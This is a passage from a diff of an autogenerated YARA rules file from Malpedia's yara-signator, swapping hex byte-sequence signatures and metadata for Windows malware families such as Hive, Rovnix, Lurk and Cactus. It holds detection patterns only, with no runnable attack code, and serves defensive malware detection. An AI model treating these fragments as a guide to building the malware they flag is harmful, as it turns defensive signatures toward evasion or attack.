+		$sequence_7 = { 56 8bf8 894c241c 89542418 ff15???????? 6a0a 56 }
+		$sequence_8 = { a1???????? 48 85c0 a3???????? 7f05 bf01000000 6a00 }
+		$sequence_9 = { 33c0 eb05 1bc0 83d8ff 85c0 0f84ba000000 8b4308 }
 
 	condition:
-		7 of them and filesize < 1822720
+		7 of them and filesize < 253952
 }
-rule MALPEDIA_Win_Crosswalk_Auto : FILE
+rule MALPEDIA_Win_Mirrorkey_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a1fb3b2b-1a2f-578d-9401-68574e21a388"
+		id = "63ba5dc8-af1b-5114-b682-e36b4410bbde"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.crosswalk"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.crosswalk_auto.yar#L1-L159"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mirrorkey"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.mirrorkey_auto.yar#L1-L116"
 		license_url = "N/A"
-		logic_hash = "84206cda2a660daf3146c7ad3e0c02d63ad7f2eb5361ae4afeb3936cb61d00b4"
+		logic_hash = "45136c9373865a91139e9dff7c71e7f62a2de8b30b90c9e3be875470ec9069c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89161,38 +89349,32 @@ rule MALPEDIA_Win_Crosswalk_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 410fbe00 49ffc0 d3ca 03d0 4183ef01 }
-		$sequence_1 = { 4c8bc6 33d2 410fbe00 49ffc0 }
-		$sequence_2 = { 41b88d56e68c 418bc0 f7e9 03d1 c1fa0b 8bc2 }
-		$sequence_3 = { 458d7ee0 418bd7 ff15???????? 4821742420 }
-		$sequence_4 = { 4883ec28 4885c9 7402 ffd1 }
-		$sequence_5 = { 458bc6 33d2 488bc8 e8???????? 4533c9 }
-		$sequence_6 = { ff15???????? 448bf0 4533c9 4533c0 }
-		$sequence_7 = { c1fa0b 8bc2 c1e81f 03d0 69c2890e0000 }
-		$sequence_8 = { ebc6 c745e0285b4100 e9???????? c745e0305b4100 e9???????? }
-		$sequence_9 = { 57 8db8948b4100 57 ff15???????? }
-		$sequence_10 = { 7313 8a87f4814100 08441619 42 0fb64101 }
-		$sequence_11 = { 8d8008824100 8945e4 803800 8bc8 }
-		$sequence_12 = { 0f8e6fffffff 83c8ff eb07 8b04cd743f4100 5f }
-		$sequence_13 = { 8b4508 dd00 ebc6 c745e0285b4100 }
-		$sequence_14 = { eb14 85db 7507 c74634f41a4100 57 ff7634 e8???????? }
-		$sequence_15 = { 83feff 0f8483000000 eb7d 8b1c9d00124100 6800080000 6a00 }
+		$sequence_0 = { 32c2 8b5508 32c1 8802 83c204 }
+		$sequence_1 = { 8a1c19 8d4f01 81e103000080 7905 49 83c9fc }
+		$sequence_2 = { 8945d4 85c0 745a ff75d0 8d45d4 50 e8???????? }
+		$sequence_3 = { 8d4de8 57 8b13 0f57c0 }
+		$sequence_4 = { 0f434dd8 8b01 8907 8b4104 8d4dc0 }
+		$sequence_5 = { 8d4f04 894dfc 8b07 03c2 7460 }
+		$sequence_6 = { 03c2 75ab 5e 5b 5f }
+		$sequence_7 = { 53 8b5f38 56 8b7754 4e }
+		$sequence_8 = { 33c0 5e 5d c20800 8b5508 }
+		$sequence_9 = { 03c7 8945ec 8b441724 03c7 8945f8 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 117760
 }
-rule MALPEDIA_Win_Redshawl_Auto : FILE
+rule MALPEDIA_Win_Powerduke_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d449834a-6ec8-5065-8b96-a5a49ffb3034"
+		id = "658a1cda-5f77-56de-9f18-f831b8e1b259"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redshawl"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.redshawl_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.powerduke_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "b20acd5fb5af80ab78c14cd6c74a0396c69511a94b51759668c7b067e28aed11"
+		logic_hash = "d2182db867ff6a53a7d17e85e856d89d6c3d1d584f315f5e805e29753b64695e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89206,32 +89388,32 @@ rule MALPEDIA_Win_Redshawl_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0f84b3020000 e8???????? 33db 488d54245c 488b88c0000000 488d0563860000 }
-		$sequence_1 = { 8bb424a0000000 448bc6 8bd7 488d0d12990000 }
-		$sequence_2 = { 742e 488d1596a10000 488bcf ff15???????? 488d156ea10000 }
-		$sequence_3 = { e8???????? 4c8d546d00 4c8d1d58c70000 49c1e204 bd04000000 4f8d442a10 498bc8 }
-		$sequence_4 = { e8???????? 488d1568ba0000 413bc7 7428 83f8fe 7423 }
-		$sequence_5 = { 488d0529c20000 483bf8 740e 833f00 7509 }
-		$sequence_6 = { 4883ec30 b84d5a0000 663905dad9ffff 7404 33db eb38 }
-		$sequence_7 = { 7577 b801000000 ff05???????? f743180c010000 7563 4c8d251ac70000 4863f8 }
-		$sequence_8 = { 33d2 8d4a02 ffd0 4c8be0 4889442430 }
-		$sequence_9 = { 0f8584010000 8a0b 33c0 80f90a 0f94c0 8944244c 488d0502860000 }
+		$sequence_0 = { 09c0 7434 0345cc 3b4518 0f87f5010000 }
+		$sequence_1 = { 50 ffb5f8fbffff ff15???????? 58 c9 }
+		$sequence_2 = { 56 ff15???????? 09c0 742f 89c7 6a00 }
+		$sequence_3 = { 09c0 7518 8d85f8f3ffff 8d8dfcfbffff 51 50 }
+		$sequence_4 = { 55 89e5 81ec08100000 56 57 8d85f8efffff }
+		$sequence_5 = { 8b451c c70000000000 837d2000 740f 8b4520 8945dc c745e000000000 }
+		$sequence_6 = { c645e000 c745e177696e68 c745e57474702e 66c745e9646c c645eb6c }
+		$sequence_7 = { 56 57 8d85f8efffff 50 6819000200 6a00 68???????? }
+		$sequence_8 = { 8d8df8f3ffff 51 68???????? 50 ff15???????? 83c40c b9???????? }
+		$sequence_9 = { 8f05???????? c705????????03000000 c745f803000000 ff75dc 8f45f0 ff75e0 8f45f4 }
 
 	condition:
-		7 of them and filesize < 174080
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Pvzout_Auto : FILE
+rule MALPEDIA_Win_Nitol_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "7f4c2c6d-072f-520f-bffa-7c86816c46e1"
+		id = "564f8c6d-172d-53bc-8a35-617f93dc2b3b"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pvzout"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.pvzout_auto.yar#L1-L120"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.nitol_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "ba6cffc93be56b2981aa18b2dfb2d12dcc79b5b9f031aee7308eec09fd3e12bc"
+		logic_hash = "f965a0fe296415280cef677cfeda82c56822d9b36e24511179288d488384a005"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89245,34 +89427,34 @@ rule MALPEDIA_Win_Pvzout_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0e 75a8 43 2f }
-		$sequence_1 = { 0e 75a8 43 1dea50873a d4a1 }
-		$sequence_2 = { e21c 3e3f 19e9 73f8 dca10ebd24e8 252b0026cb 9e }
-		$sequence_3 = { 75a8 43 2f 3089f33d80f3 }
-		$sequence_4 = { 03dd 81eb00d00200 83bd8804000000 899d88040000 0f85cb030000 8d8594040000 50 }
-		$sequence_5 = { b8132d0000 50 038588040000 59 0bc9 89850e040000 61 }
-		$sequence_6 = { 01e3 b105 18830d88a01c 51 }
-		$sequence_7 = { bf95f6810e 75a8 43 1dea50873a d4a1 }
-		$sequence_8 = { 5d bbedffffff 03dd 81eb00d00200 83bd8804000000 899d88040000 0f85cb030000 }
-		$sequence_9 = { b3d7 5a bf95f6810e 75a8 43 1dea50873a }
+		$sequence_0 = { 6a28 8d8540ffffff 50 e8???????? 83c440 668945f6 8d45ec }
+		$sequence_1 = { 57 56 68???????? 57 57 ffd5 68e8030000 }
+		$sequence_2 = { 3bc5 89442410 750e ffd7 99 b9e8030000 }
+		$sequence_3 = { 50 e8???????? 59 40 50 8d8568faffff 50 }
+		$sequence_4 = { 33db 39be88000000 0f8ee5000000 57 57 56 68???????? }
+		$sequence_5 = { 8d85e8faffff 50 ff15???????? 83c418 833d????????01 744a ff75e8 }
+		$sequence_6 = { 0f86d5030000 6a4b 50 e8???????? 8d8588f4ffff 50 e8???????? }
+		$sequence_7 = { 50 ff15???????? 668365f600 6800010000 e8???????? 83c41c 8845f4 }
+		$sequence_8 = { c645ed11 ff15???????? 8945f0 8d852cffffff 50 e8???????? 8945f4 }
+		$sequence_9 = { ffd6 668945d6 8d45cc 6a0c 50 8d8540ffffff }
 
 	condition:
-		7 of them and filesize < 573440
+		7 of them and filesize < 139264
 }
-rule MALPEDIA_Win_Hive_Auto : FILE
+rule MALPEDIA_Win_Noxplayer_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "648fda14-26aa-5cb6-b0b0-33ac82fa76a4"
+		id = "fab5d56f-e9c6-515a-ae0f-470960c542fb"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hive"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.hive_auto.yar#L1-L193"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.noxplayer"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.noxplayer_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "b786ded85189e10c8f992d72b9f33dda53290c7d2488c59423c5787b80ba3c77"
+		logic_hash = "77744292ebf109ed57f41d00cb6e30b7a306c1c6c824a437b236cefc116466ee"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89284,45 +89466,34 @@ rule MALPEDIA_Win_Hive_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { b807000000 b9d4000000 31d2 31db }
-		$sequence_1 = { 31c0 b9aa000000 31d2 31db }
-		$sequence_2 = { 31c0 6690 e8???????? 85c0 7569 }
-		$sequence_3 = { 7f1e 0fbae000 73ed 90 66c74424426341 66c74424400000 }
-		$sequence_4 = { 31c0 31c9 31d2 bb04000000 beb8000000 31ff }
-		$sequence_5 = { 89c2 e8???????? b801000000 e8???????? 90 }
-		$sequence_6 = { 89d1 e8???????? b802000000 e8???????? b802000000 }
-		$sequence_7 = { 31c0 31c9 31d2 bb06000000 be41000000 31ff }
-		$sequence_8 = { 31c0 e8???????? e8???????? 833d????????00 750e }
-		$sequence_9 = { 31c0 eb13 0fb654044b 0fb674041e }
-		$sequence_10 = { 81c4b0000000 c3 e8???????? 90 }
-		$sequence_11 = { 89d1 e8???????? b901000000 e8???????? }
-		$sequence_12 = { 01c1 c1e106 400fb6d6 01ca }
-		$sequence_13 = { 01c0 4000f8 0fb6c0 48898424b0000000 }
-		$sequence_14 = { 01c8 89c1 c1e91f ffc9 }
-		$sequence_15 = { 01c2 b8ffffff03 21c5 21c3 }
-		$sequence_16 = { 01c8 c1e006 400fb6cf 01c1 }
-		$sequence_17 = { 01c1 c1e106 0fb6c2 01c8 }
-		$sequence_18 = { 01c1 83c101 83f90c 0f820fffffff }
-		$sequence_19 = { 01ca c1e206 0fb6c3 01d0 }
-		$sequence_20 = { 898c2488000000 8984248c000000 83c478 c3 85db 7609 }
+		$sequence_0 = { 488b11 89449afc 483bdd 7cdd 488d5e28 41bc04000000 }
+		$sequence_1 = { 8b0cb8 41890b e8???????? 488b4e10 4c8bd8 442b1cf9 3b7e1c }
+		$sequence_2 = { 48634810 488b00 486bc968 488d540198 48395318 7417 488b4318 }
+		$sequence_3 = { 4889b180000000 4889b1d0000000 4889b188000000 4889b1d8000000 4889b1e0000000 4889b190000000 4889b1e8000000 }
+		$sequence_4 = { 488bd8 482b1f 483b4710 750d ba01000000 488bcf e8???????? }
+		$sequence_5 = { 8b4328 41894618 33c0 e9???????? 488b4740 488b4810 8b4760 }
+		$sequence_6 = { 488bc6 48894360 c6436800 488d442430 4889442428 89742420 4c8bcb }
+		$sequence_7 = { 488b1b 488bcf e8???????? 488bfb 807b2100 74e0 33d2 }
+		$sequence_8 = { 80792900 7513 483b4110 750d 488bc1 488b4908 }
+		$sequence_9 = { 413bc9 7e04 ffc7 03c1 4883c204 49ffc8 75e7 }
 
 	condition:
-		7 of them and filesize < 7946240
+		7 of them and filesize < 742400
 }
-rule MALPEDIA_Win_Juicy_Potato_Auto : FILE
+rule MALPEDIA_Win_Rovnix_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8d631ed2-d4c1-50a7-a41e-e61bbdbf9578"
+		id = "75582b32-2396-52b5-ad83-7563a2940a52"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.juicy_potato"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.juicy_potato_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.rovnix"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.rovnix_auto.yar#L1-L331"
 		license_url = "N/A"
-		logic_hash = "95a9bfa286d63983a17370c06426811d86dabf6e0c8c9f41f87914697070c991"
+		logic_hash = "ed6329dc4f284f83c7abc03edae1041f365607dbb53bb190660ed33f6a939524"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -89334,32 +89505,58 @@ rule MALPEDIA_Win_Juicy_Potato_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 488d15f58effff e8???????? 8d4701 8903 8b0b 8b4304 }
-		$sequence_1 = { 488b742460 488b7c2468 4883c440 415e c3 488d151af80100 }
-		$sequence_2 = { 488b13 4983c8ff 660f1f440000 49ffc0 6642390442 75f6 488d0dbffe0400 }
-		$sequence_3 = { 49ffc0 6642390442 75f6 488d0dbffe0400 e8???????? eb2e ffcf }
-		$sequence_4 = { 7411 488d05048c0400 483bc8 7405 }
-		$sequence_5 = { 4983e801 75e3 4d63ee 498bcd c7459f005d0000 c745a30000000a c745a700ffff00 }
-		$sequence_6 = { 7427 488b4c2438 488d15f6ee0200 ff15???????? 488bd8 4885c0 }
-		$sequence_7 = { 4c8bf1 8360b800 4c8d0d44880200 4c8d057d880200 33d2 }
-		$sequence_8 = { 8360b800 4c8d0d44880200 4c8d057d880200 33d2 488bcb e8???????? 488bf8 }
-		$sequence_9 = { 488d8d24030000 898520030000 e8???????? 488d0dc1c0feff 48c1e602 0fb784b950fc0300 488d9140f30300 }
+		$sequence_0 = { c1e902 ad 2bc3 ab e2fa }
+		$sequence_1 = { 8bf8 83c335 c1e902 ad }
+		$sequence_2 = { 6a00 ffd2 89442408 8bcf }
+		$sequence_3 = { 8b15???????? 83e7f0 89542418 83c710 }
+		$sequence_4 = { 7405 57 6a00 ffd2 }
+		$sequence_5 = { bf40090000 be???????? 8b15???????? 83e7f0 }
+		$sequence_6 = { 8d4e1c 8908 8b4508 c7461801000000 8b4804 8906 }
+		$sequence_7 = { c745cc18000000 8975d0 c745d800020000 8975d4 }
+		$sequence_8 = { c745d800020000 8975d4 8975dc 8975e0 }
+		$sequence_9 = { c1e802 25ff000000 8d4cc624 8b01 }
+		$sequence_10 = { 7703 83c220 85c0 7404 }
+		$sequence_11 = { 8975e4 c745ec40020000 8975e8 8975f0 8975f4 ff15???????? }
+		$sequence_12 = { 7306 8b00 3bc1 75f3 395e14 }
+		$sequence_13 = { 85c0 7405 8d4e1c 8908 }
+		$sequence_14 = { 8b5e14 8b7e10 eb06 8b5d0c 8b7d08 8bcf }
+		$sequence_15 = { 85c0 e8???????? 8be5 5d c3 }
+		$sequence_16 = { 23c9 16 85c9 23d2 }
+		$sequence_17 = { 23db 81e1ff000000 23c9 83440c0404 }
+		$sequence_18 = { 5d c3 85c0 e8???????? }
+		$sequence_19 = { 5d c3 85c9 e8???????? }
+		$sequence_20 = { 55 8bec 85db 85c9 }
+		$sequence_21 = { 2d02ca3b45 05bd6f0e7b 2d3f459239 5a }
+		$sequence_22 = { 488b8c24d0000000 c744244818000000 488d442470 4889442440 896c2438 488d442460 48896c2430 }
+		$sequence_23 = { 747b 488d0543fcffff 488d0d18630000 33d2 48894310 48894320 48894328 }
+		$sequence_24 = { d6 b772 9af6b95c8decc4 7c8f d6 b772 9af6b95c8decc4 }
+		$sequence_25 = { 3425 33ce 3d6aa7d294 61 89fa 94 61 }
+		$sequence_26 = { e018 0fb61cc0 50 68???????? 6a04 57 }
+		$sequence_27 = { 8bda 4803d8 83e3e0 c1ea05 448bc1 3bd1 0f8683000000 }
+		$sequence_28 = { 4c3b02 750e 448a410b 443a4208 7504 8bc6 eb05 }
+		$sequence_29 = { 85db 8b4d08 85db 85c9 81e1ff000000 }
+		$sequence_30 = { 4b 46 92 c55151 a2???????? d24b46 }
+		$sequence_31 = { 6e 17 48 2b6e17 48 8ee2 }
+		$sequence_32 = { 488d542430 488d4c2440 e8???????? 41b910000000 488d542450 458d41f1 488d4c2478 }
+		$sequence_33 = { ff15???????? 48295c2428 6601742420 6601742422 bb01000000 eb0a bf9a0000c0 }
+		$sequence_34 = { 1f d337 a6 ff08 f26d 17 }
+		$sequence_35 = { 488b03 488905???????? 488b4308 488905???????? 8b4310 8905???????? 488b4b20 }
 
 	condition:
-		7 of them and filesize < 736256
+		7 of them and filesize < 548864
 }
-rule MALPEDIA_Win_Banatrix_Auto : FILE
+rule MALPEDIA_Win_Lurk_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "702dab13-4bb6-5a8c-a445-48baade0f697"
+		id = "d33e5d41-4c33-52cb-9d86-097c6e297a69"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.banatrix_auto.yar#L1-L123"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lurk"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.lurk_auto.yar#L1-L176"
 		license_url = "N/A"
-		logic_hash = "b32ec448caee97c1e074a70cc1c0b66b914a64f46a4b1bc215e4633ee2c8f80d"
+		logic_hash = "49386f4cf56b83db74fc2cce7fdb3bbe57cfb7600cc336d7243ab2a9983dbda5"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89373,32 +89570,38 @@ rule MALPEDIA_Win_Banatrix_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c744240c04000000 c744240800100000 03420c 8955c4 890424 }
-		$sequence_1 = { 56 56 7416 8b03 c745d000000000 0fb75014 8d741018 }
-		$sequence_2 = { c704245a040000 e9???????? c7431001000000 89d8 eb02 }
-		$sequence_3 = { e8???????? 85c0 7505 c60300 eb56 8b5704 }
-		$sequence_4 = { e8???????? 8b4304 85c0 741b c744240800800000 c744240400000000 890424 }
-		$sequence_5 = { eb20 8b7514 39f0 7306 c6040300 }
-		$sequence_6 = { 83c628 8b13 0fb74206 3945d0 7cc8 eb6d 89c7 }
-		$sequence_7 = { e8???????? 89c6 8b45e4 0fb7f6 890424 }
-		$sequence_8 = { 8b5d08 85db 0f849c000000 837b1000 7429 8b13 }
-		$sequence_9 = { 8b450c 5d 8b4004 c3 55 89e5 }
+		$sequence_0 = { ff7508 ff15???????? 8b35???????? 50 ff7508 }
+		$sequence_1 = { 8b4508 5b 5f 5e c9 c3 55 }
+		$sequence_2 = { 384807 7562 384808 755d 384809 }
+		$sequence_3 = { c1ee05 33ce f7d1 33c1 42 43 3b5c2410 }
+		$sequence_4 = { c1f803 8945f4 c745f800000000 eb09 8b4df8 83c101 894df8 }
+		$sequence_5 = { 8b7c240c 33f6 6a04 57 6a03 e8???????? 83c40c }
+		$sequence_6 = { ffd6 83f802 7546 8365bc00 8d45b8 50 6a20 }
+		$sequence_7 = { 8b4d08 ff75f8 03c3 c7406045763812 }
+		$sequence_8 = { 8b4d08 8d440802 50 ff75fc ff5714 }
+		$sequence_9 = { 8b4dd8 0308 894db8 8365bc00 8b45bc c1c80d 8945bc }
+		$sequence_10 = { 74de 56 8b35???????? 8d85fcfeffff 50 ffd6 8d8dfcfeffff }
+		$sequence_11 = { 8945cc 8b45e0 668b4024 668945c8 }
+		$sequence_12 = { c645fa25 c645fb75 c645fc2f c645fd00 e8???????? }
+		$sequence_13 = { ff7508 ff7510 e8???????? 83c418 85c0 7502 33f6 }
+		$sequence_14 = { 8b4d08 8d540102 8955f8 8b45f8 }
+		$sequence_15 = { 8bec 83ec0c 53 56 8b7508 0fb606 }
 
 	condition:
-		7 of them and filesize < 180224
+		7 of them and filesize < 5316608
 }
-rule MALPEDIA_Win_Dircrypt_Auto : FILE
+rule MALPEDIA_Win_Cactus_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6dfaa124-348a-5731-9f6e-b3677fe125b4"
+		id = "7aadb4fa-1562-5d38-a064-9b891a040980"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dircrypt"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.dircrypt_auto.yar#L1-L119"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cactus"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.cactus_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "62b8e91a741487003e5f68773b4563818c6ceb487f0acf4f30c08c003042c088"
+		logic_hash = "4cf0fe68934e99fc9c68b61a4ebb1a3c34839913d17fce2a657defa1e18dd776"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89412,32 +89615,32 @@ rule MALPEDIA_Win_Dircrypt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 6a01 6a10 ff15???????? 50 }
-		$sequence_1 = { e8???????? e8???????? e8???????? 68???????? ff15???????? 833d????????00 751a }
-		$sequence_2 = { 51 6a00 6a00 8d45fc 50 68???????? 6802000080 }
-		$sequence_3 = { 51 ff15???????? 8945fc 8b450c 2b4508 }
-		$sequence_4 = { 833d????????00 7528 c705????????01000000 e8???????? e8???????? }
-		$sequence_5 = { 68???????? e8???????? 05d2070000 50 }
-		$sequence_6 = { 51 ff15???????? 8945fc 8b450c 2b4508 50 }
-		$sequence_7 = { 833d????????00 751e c705????????01000000 e8???????? e8???????? e8???????? }
-		$sequence_8 = { e8???????? 68???????? e8???????? e8???????? 6a01 e8???????? }
-		$sequence_9 = { 6a01 6a06 8d45dc 50 }
+		$sequence_0 = { e8???????? 48897cc500 488b05???????? c705????????01000000 4883c010 488905???????? f08305????????01 }
+		$sequence_1 = { e8???????? 488d05524c3300 4c8b442430 4889e9 4a8d543850 e8???????? 448b9c240c030000 }
+		$sequence_2 = { f30f6f842480000000 660fc6c901 660f73d138 48894c2478 660fc6c001 660fdbc6 660fd4c1 }
+		$sequence_3 = { e8???????? 4c8d05648e1900 ba80010000 488d0d388d1900 e8???????? 4531c0 ba94000000 }
+		$sequence_4 = { e8???????? 4c8d05e1cc2400 bad3010000 488d0d6dca2400 e8???????? 4531c0 ba65000000 }
+		$sequence_5 = { e8???????? 488d159c933a00 4889f9 4989c0 e8???????? 85c0 7425 }
+		$sequence_6 = { e8???????? 4889c7 4885c0 0f8447010000 488d5008 4889f1 e8???????? }
+		$sequence_7 = { 89c2 31c6 4189c3 c1c202 41c1c30a 31f2 4431da }
+		$sequence_8 = { e8???????? 488b15???????? 4889f1 e8???????? 85c0 755f 803b00 }
+		$sequence_9 = { e8???????? 4889c3 4885c0 0f84ba000000 b801000000 874310 e8???????? }
 
 	condition:
-		7 of them and filesize < 671744
+		7 of them and filesize < 13587456
 }
-rule MALPEDIA_Win_Satana_Auto : FILE
+rule MALPEDIA_Win_Strifewater_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ed6576e9-0bbc-54e1-95d8-b27f8b1348bf"
+		id = "93638997-4b39-56df-8c2c-e15416c268e2"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.satana"
-		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.satana_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strifewater_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/6558c417dcf07146b1309b6acde6be0aa96dea10/rules/win.strifewater_rat_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "b7981beec1674ab80a9c4719e1b8a6cb3eebb0c2a5e13afc377fa72d8a4a6216"
+		logic_hash = "c4c860d44d36734eadf7062d94acf85100c901ee56a2bc935f573163c784a260"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -89451,32 +89654,32 @@ rule MALPEDIA_Win_Satana_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d8578ffffff 50 56 51 ffd7 8b4df0 6a00 }
-		$sequence_1 = { bfff000000 f7ff 8a8258fd4000 8845fe eb04 }
-		$sequence_2 = { 689f011200 56 ff15???????? 8bf8 897da8 }
-		$sequence_3 = { 50 ff15???????? be???????? e8???????? 0fb60d???????? 51 6a02 }
-		$sequence_4 = { 0f8418010000 68ff0f0000 8d85fdefffff 6a00 50 c685fcefffff00 e8???????? }
-		$sequence_5 = { 52 68???????? e8???????? a1???????? 83c408 6aff 6a01 }
-		$sequence_6 = { ff15???????? 8bce a3???????? 85c9 7412 8d9b00000000 }
-		$sequence_7 = { ebeb e8???????? e9???????? 8b45b8 85c0 7403 880437 }
-		$sequence_8 = { c745f478817e51 66c745f88500 e8???????? 8b15???????? 50 }
-		$sequence_9 = { 68???????? 57 8945e4 ffd3 }
+		$sequence_0 = { 57 4154 4155 4156 4157 488dac24e0d4ffff b8202c0000 }
+		$sequence_1 = { 48894108 48894110 488d05574d0400 488901 488bc1 c3 33c0 }
+		$sequence_2 = { 488d0d3c8f0600 e8???????? 48894610 e8???????? 488bf8 4885c0 7414 }
+		$sequence_3 = { 7510 e8???????? c70016000000 e8???????? 488d4318 498906 488b5c2450 }
+		$sequence_4 = { 48894c2428 4889442420 4c8d8dc8010000 448bc6 488d154fff0800 488d8d900f0000 e8???????? }
+		$sequence_5 = { 488bf0 4863cb c6040100 33c9 85db 7e3f 488bd0 }
+		$sequence_6 = { 0338 85ff 0f8ee0010000 4863f7 488bce e8???????? 4c8bf0 }
+		$sequence_7 = { 488d05d8e3feff 4889442430 488d4c2420 e8???????? 4c396b08 74f0 488b5b08 }
+		$sequence_8 = { 4053 4883ec20 488bd9 488bc2 488d0d0d890200 48890b 488d5308 }
+		$sequence_9 = { 90 be01000000 89b424b0000000 83630800 488d0d10400500 48890b }
 
 	condition:
-		7 of them and filesize < 221184
+		7 of them and filesize < 1552384
 }
-rule MALPEDIA_Win_Brambul_Auto : FILE
+rule MALPEDIA_Win_Quiterat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ab481228-bdce-550e-a6f6-2d8dfaa70a2b"
+		id = "77d947fb-1cf9-5915-bdff-e8a9015c7494"
 		date = "2024-10-31"
 		modified = "2024-11-11"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.brambul"
